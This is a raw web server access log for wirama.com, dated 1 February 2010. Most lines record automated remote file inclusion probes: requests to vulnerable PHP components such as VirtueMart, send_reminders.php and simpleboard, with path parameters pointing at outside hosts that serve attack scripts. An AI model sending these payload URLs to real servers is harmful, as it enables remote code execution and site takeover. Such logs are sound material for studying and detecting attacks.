193.28.184.15 - - [01/Feb/2010:06:05:59 -0800] "GET /logs/access_091101.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:06:05:59 -0800] "GET /administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:06:05:59 -0800] "GET /logs//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:06:06:06 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.28.184.15 - - [01/Feb/2010:06:06:26 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/print.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:06:09:16 -0800] "GET /logs/access_090330.log%20%20/?_zb_path=http://www.kompiks.pl//administrator/components/com_virtuemart/modules/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.93.36.90 - - [01/Feb/2010:06:09:16 -0800] "GET /logs/?_zb_path=http://www.kompiks.pl//administrator/components/com_virtuemart/modules/FxID1.txt?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "www.wirama.com"
219.93.36.90 - - [01/Feb/2010:06:09:19 -0800] "GET /?_zb_path=http://www.kompiks.pl//administrator/components/com_virtuemart/modules/FxID1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
205.209.170.10 - - [01/Feb/2010:06:12:36 -0800] "GET /robots.txt HTTP/1.0" 404 - "http://majestic12.co.uk/bot.php?I=3812291DAB-0000C01A2BA7C16D-www_wirama_com" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)" "www.wirama.com"
205.209.170.10 - - [01/Feb/2010:06:12:37 -0800] "GET /logs/scripts.log HTTP/1.1" 200 26731 "http://www.arabgo.com/index/click?url=http://www.wirama.com/logs/scripts.log&query_id=7376&lang=" "Mozilla/5.0 (compatible; MJ12bot/v1.3.2; http://www.majestic12.co.uk/bot.php?+)" "www.wirama.com"
221.139.0.75 - - [01/Feb/2010:06:13:56 -0800] "GET /logs//write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.139.0.75 - - [01/Feb/2010:06:13:56 -0800] "GET /logs/access_091101.log//write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.139.0.75 - - [01/Feb/2010:06:13:56 -0800] "GET /logs/access_091201.log//write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.139.0.75 - - [01/Feb/2010:06:13:56 -0800] "GET /write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:13:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:13:59 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:13:59 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:01 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:01 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:05 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:05 -0800] "GET /logs/access_090801.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:37 -0800] "GET /logs/access_100101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:40 -0800] "GET /logs/access_100101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:14:44 -0800] "GET /logs/access_100101.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.180 - - [01/Feb/2010:06:17:06 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
219.93.36.90 - - [01/Feb/2010:06:17:23 -0800] "GET /logs/access_090601.log/?_zb_path=http://www.kompiks.pl//administrator/components/com_virtuemart/modules/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:06:17:23 -0800] "GET /logs/?_zb_path=http://www.kompiks.pl//administrator/components/com_virtuemart/modules/FxID1.txt?? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:06:17:23 -0800] "GET /?_zb_path=http://www.kompiks.pl//administrator/components/com_virtuemart/modules/FxID1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
65.55.106.180 - - [01/Feb/2010:06:18:08 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
219.93.36.90 - - [01/Feb/2010:06:21:18 -0800] "GET /logs/access_090330.log/?_zb_path=http://www.kompiks.pl//administrator/components/com_virtuemart/modules/FxID1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:27:23 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:27:23 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:27:23 -0800] "GET /logs/access_091031.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:06:30:32 -0800] "GET /logs/access_091201.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:06:30:32 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:06:30:32 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.240.36.36 - - [01/Feb/2010:06:30:44 -0800] "GET /logs/access_090901.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:31:57 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:31:57 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:31:58 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:31:58 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:31:59 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:32:05 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:32:33 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:32:38 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.79.246.80 - - [01/Feb/2010:06:32:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:32:58 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:32:58 -0800] "GET /logs/access_090731.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:03 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:03 -0800] "GET /logs/access_090731.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:04 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:04 -0800] "GET /logs/access_090731.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:10 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.79.246.80 - - [01/Feb/2010:06:33:10 -0800] "GET /logs/access_090731.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:01 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:24 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:28 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:34:53 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:36:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:36:12 -0800] "GET /logs/access_090731.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:36:12 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:36:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:36:32 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
58.150.99.131 - - [01/Feb/2010:06:36:32 -0800] "GET /logs/access_090731.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:37:39 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:37:39 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:37:39 -0800] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:37:47 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:37:47 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:37:47 -0800] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:38:02 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:38:02 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:38:02 -0800] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.80.108.81 - - [01/Feb/2010:06:38:06 -0800] "GET /logs/access_090801.log//skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.80.108.81 - - [01/Feb/2010:06:38:06 -0800] "GET /skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.80.108.81 - - [01/Feb/2010:06:38:06 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.80.108.81 - - [01/Feb/2010:06:38:06 -0800] "GET /logs/access_091101.log//skin/zero_vote/login.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:38:15 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:38:15 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:38:15 -0800] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:38:30 -0800] "GET /logs/access_090601.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:39:16 -0800] "GET /logs/access_090330.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:39:45 -0800] "GET /logs/access_090330.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:40:08 -0800] "GET /logs/access_090330.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:40:34 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:40:34 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:06:40:34 -0800] "GET /logs/access_090330.log/components/com_simpleboard/image_upload.php?sbp=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:42:07 -0800] "GET /logs/access_091031.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:42:07 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:06:42:07 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.195.112.29 - - [01/Feb/2010:06:44:10 -0800] "GET /logs/?S=A HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
94.23.213.200 - - [01/Feb/2010:06:45:23 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "wirama.com"
94.23.213.200 - - [01/Feb/2010:06:45:23 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
94.23.213.200 - - [01/Feb/2010:06:45:23 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "wirama.com"
94.23.213.200 - - [01/Feb/2010:06:45:23 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.zacedenim.com/cmd?%0D?&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "wirama.com"
208.65.73.202 - - [01/Feb/2010:06:53:27 -0800] "GET / HTTP/1.1" 200 916 "http://www.rfidupdate.com/articles/index.php?id=1542" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
208.65.73.202 - - [01/Feb/2010:06:53:27 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
208.65.73.202 - - [01/Feb/2010:06:53:30 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:06:54:48 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:54:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:54:48 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:15 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:15 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:18 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:36 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:45 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:55:46 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:56:09 -0800] "GET /logs/access_090501.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:56:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:56:16 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:06:56:16 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.213.58 - - [01/Feb/2010:06:56:22 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.213.58 - - [01/Feb/2010:06:56:22 -0800] "GET /logs/access_100101.log////skin/ggambo7002_board/comment_modify.php?dir=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
